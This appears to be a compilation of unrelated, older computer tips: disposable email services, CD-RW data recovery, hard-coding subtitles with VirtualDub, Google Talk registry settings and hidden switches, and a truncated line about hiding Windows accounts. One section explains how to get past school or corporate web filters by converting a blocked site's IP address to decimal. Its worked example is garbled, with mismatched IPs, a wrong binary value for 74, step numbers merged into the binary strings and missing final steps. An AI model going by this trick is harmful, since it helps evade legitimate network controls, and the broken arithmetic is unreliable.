Have you ever had the situation to sign up for a site which requires e-mail to send the validation email to and you didnt want to give your real e-mail because of threat from spammers !!
From my experience, I end up using regularly around 5-10% of the web sites i subscribe to. Some of the web sites i subscribed to but don’t use, turned to be unfriendly SPAMmers, resulting in productivity loss and other annoyances. Sort of Catch 22, isn’t it?
An applicable solution is to provide web sites we subscribe to with a temporary email address that will allow us to subscribe and evaluate the web site, but will prevent them to SPAM us in case we are not interested in their services.
There are several services that i found useful and thus i recommend you to add them to your Antispam toolbox:
1. MailExpire.com: provides a temporary email address available for a period of time starting from 12 hours to 3 months. Anything sent to that account is forwarded to your real email address.
2. GetOneMail.com: here’s the concept is a bit different. It provides you with a dispensable one-time email address that you can use for an ad hoc subscription to a web site.
3. Mailinator: provides you with a read only (and non secure) dispensable mail address that you can use when interacting with web sites that might potentially spam you.
4. 10MinutesMail: There will be a link to generate 10 minutes e-mail address. Once you click it, you will be given a temporary e-mail address. Any e-mails sent to that address will show up automatically on the web page. You can read them, click on links, and even reply to them. The e-mail address will expire after 10 minutes. You can also extend the e-mail by another 10 minutes

Recover Data from a Quick-erased CD-RW Disc
Procedure used to recover data from a quick-erased CD-RW disc
1. Make a file of exactly the size of the cdrw disc's capacity (650MB in my case).
(this step may not be needed)
2. With Nero I created a new project and added the file to it so that I have the disc filled. I gues you can also fill up the disc with other files.
The reason why I fill the disc is because I want Nero to make a session that uses the entire disc. Like I wrote earlier in this thread I experienced that my CD-Drive refuses to read off the disc beyond the session's boundaries. When you quick-erase a disc there is no session anymore so the drive will not read at all. Burning a new session will overwrite the data and burning only a small session will NOT make the drive read the other data that is still on the disc.
The reason why I used the one big file is so that I could later on recognize which part of the disc was overwritten by this file because this file contained all zeros (0x00).
3. I pressed burn and selected disc-at-once. Then while Nero was burning the leadin I pressed cancel. My CD-Drive finished writing the lead-in and Nero reported an error.
This is what was accomplished however: Now the disc contains a session that says that the used disc size is the complete disc. Nero did not get to writing file because I cancelled it. Good thing because I don't want Nero to write any files because my old data will get overwritten!
I gues it works the same with different writing software. Another method that I used during a test was simply press the reset button of the computer when the burning software was done with writing the lead-in and started with the files.
4. I had to restart the computer after cancelling burning.
With the cdrw disc inserted I saw in "my computer" that windows recognized that the disc was 650MB, clicking on it gave an error. Good so far!
Now with IsoBuster you can extract the sectors from a disc to a file. This is what I did.
I gues that if you have data-recovery software at this point it will be usefull because now (if all went well;)) the CD-Drive WILL read data from the entire disc. Anyway, I used ISO-Buster because the files that I needed to recover where a bit odd for nowadays (.XM, .S3M, .MP3):
In IsoBuster I had to do several steps:
Step 1: Find out from and to which sector the drive will read
By choosing "Sector View" you can look at any given sector.
Here I found out what the first and the last sectors where that are readable. (Hint I used the method for the old game: "Gues a number below 100, I'll tell if it is higher or lower than what you gues")
Step 2: Extract the actual sectors
By choosing "Extract From-To" you can extract any given range of sectors to a file. My disc was a data-disc so I choose the first extraction type "User data, 2048 bytes/block...".
In the end I got a .tao file which was about 650MB. I ran several programs on it to look for files inside a file by searching for file-header-paterns:
1. Multi Ripper 2.80 (for DOS, for the .XM files. It does many other file formats as well (jpg,png, bmp,wav,etc,etc +100). Try google with this query: Multi Ripper 2.80. I still had the file from good old days but I saw several good search results)
2. Winamp for mp3.
Winamp will scan any file when you give it the extension .mp3 and play it as one big song (so I renamed the .tao file to .mp3). I used the discwriter to get a .wav and the Adobe Audition to manually cut and save my songs. I looked at the MP3 file format and it is hard to find an mp3 file in a big file because it has no clear header just a bunch of mpeg-frames in most cases for me . A lot of my files had no ID3v2 or ID3v1 tags... But after a couple of hours I recovered everything.

Adding Movie Subtitles , 5 Easy Steps !!
This guide explains step by step how to 'paste' subtitles into any video file permanently. The subtitle file can be in any format (SUB, SSA, SMI, TXT, etc.)
Permanent subtitles are specially useful if you are about to create a VCD/SVCD, or if you want to watch subtitled movies with any media player or portable device.
Required Software
1-VirtualDub or virtualDubMod: Used to re-encode the video with the subtitles included.
2-VirtualDub Subtitler Filter: Filter to apply the SSA subtitle file
3-Subtitle WorkShop: Subtitle editor tool
4-DivX Codec: Used to re-enconde the video with VirtualDub.
Step 1: Install the subtitler filter
After you have downloaded the VirtualDub Subtitler Filter, copy subtitler.vdf into the \PLUGINS directory under the VirtualDub program directory. If the PLUGINS folder does not exists, create it.
Step 2: Edit the subtitle file
Even if your subtitles are already in SSA (SubStation Alpha) format, this step is required to customize the subtitles aspect. Subtitle Workshop will be used here to convert the subtitles to SSA and/or edit their font aspect and position in the output video.
Open the subtitles with Subtitle Workshop in File>Load Subtitles.
Then....Go to Settings > Output Settings...
The Output Settings dialog will open up
Select Substation Alpha (*.ssa)
The recommended subtitle fonts are Arial, Arial Narrow and Tahoma, usually Bold. The font color should be a brigth one (yellow or white), and the secondary colors should be black. At the Others tab at the same dialog, you can customize several additional settings.
Now you can save the subtitles from the File menu. When saving make sure to double click the SSA format.
Step 3: Apply the subtitles with VirtualDub
After you have created your SSA subtitles, start VirtualDub and open the target movie. We'll recompress the movie with the subtitles in this last step. Note: There is no way to apply the subtitles without recompressing the video.
Go to the Video menu and select Filters.
Click the Add... button.
Select the "subtitler" filter and click OK.
After you click OK, the Subtitler Configuration dialog should appear. Click the "..." button and browse to the SSA file you have previously saved with the SubStation Alpha editor.
If you want to use the original subtitle file word wrapping mode, select Manual word wrapping. You can also use the Automatic or Smart word wrapping modes, but when playing the video and applying Pan&Scan feature, long subtitle lines won't fit the video viewable area.
Click Show Preview to see how your subtitles will appear in the encoded video.To scroll faster, hold down SHIFT while moving the video position slider. If you are satisfied with the results, proceed by closing all opened dialog windows.
Step 4: Save and encode the video fileTo save the video file with the applied captions, we will have to recompress the video and leave audio stream as is.
Under Video select Full Processing Mode, and under Audio select Direct Stream Copy.
Go to Video > Compression. Double click the DivX 5 codec (thats why we need the DivX 5 Codec)
Finally go to File > Save As AVI... and enter a file name for the output video. The encoding process will start and your output video will include the subtitles permanently.

This unique Mathematics based trick will probably work when websites are blocked in your institution or corporate network based on the host name or their IP address.The trick is to convert the human readable website address that's blocked (like Link:) into an IP address (208.75.184. 160) and again translate this value to a decimal address which is probably not blocked by the website filters.

1) get its IP address (216.178.39. 74), by pinging the name (if you have a direct internet connection) or if you only have access via a web proxy then find it out by using a networking website like network-tools. com.
2) start your PC's calculator, and change it to scientific mode (using the "View" menu)
3) enter each of the four IP octets, one by one, converting them to binary (enter number and click on the "Bin" radio button)
Thus 216.178.39.74 becomes
216 = 11011000
178 = 10110010
39 = 00100111
74 = 0100101
Notice how any binary numbers less than 8 digits long have had leading zeroes added to pad them out. Reassembled into IP address order, you get 11011000.10110010. 00100111. 010010104)
Remove the dots, so you get one huge line of binary, thus: 1101100010110010001 00111010010105) Copy this binary string.........
6) Go to your scientific calculator, and hit the "Bin" button FIRST (as you are about to enter binary), THEN paste in the binary string.

Wuntoo adds: I used to be in a place that had websense, where both website names and their corresponding IP addresses were blocked. However was able to get limited access by converting the IP address to decimal, which websense (at the time) did not know about.
This might have changed since, or if your school runs an old version it might still work. Note that if you surf away from the page you might hit websense blocks again unless you manually reconstruct the next address you want to get to.

With Google Talk Messenger being all the craze right now, some people hating it, and others loving it, I figured that I would post a list of tips and tricks for those curious about the extra "features" Google implemented and has not said much about.
You can edit most settings by opening regedit (start -> regedit), and navigating to the key HKEY_CURRENT_USER/Software/Google/Google Talk.
The "Google/Google Talk" key has several sub-keys that hold different option values:
Accounts: This one has subkeys for each different account that has logged in on the client. These keys have different values that store the username, password and connection options.
Autoupdate: Stores the current version information. When the client checks for updates it compares Google's response with these values. If an update is needed, it will download and update the new version.
Options: This is the most interesting part, where most of the current hacks should be used (keep reading).
Process: Stores the process ID. Probably used by Google Talk to detect if it's already running or not.

There are a few secret parameters you can add to Google Talk and make it function differently.
/nomutex, which allows you to run more than one instance of GT.
/autostart, when Google Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the "Start automatically with Windows" option is unchecked, it won't start.
/forcestart, same as /autostart, but forces it to start no matter what option was set.
/S upgrade, Used when upgrading Google Talk
/register: registers Google Talk in the registry, includig the GMail Compose method.
/checkupdate: check for newer versions
/plaintextauth: uses plain authentication mechanism instead then Google's GAIA mechanism. Used for testing the plain method on Google's servers.
/nogaiaauth: disables GAIA authentication method. The same as above.
/factoryreset: set settings back to default.
/gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
/mailto email@host.com: send an email with Gmail
/diag: start Google Talk in diagnostic mode
/log: probably has something to do with the diagnostic logging
To add these, open up your GT shortcut, and where it says "Target:" add one or more of these inside the quotations, but after the .exe part

The tweak allows an account to be hidden on the Windows that other users account, This feature is only available in Windows 2000 and Windows xp.
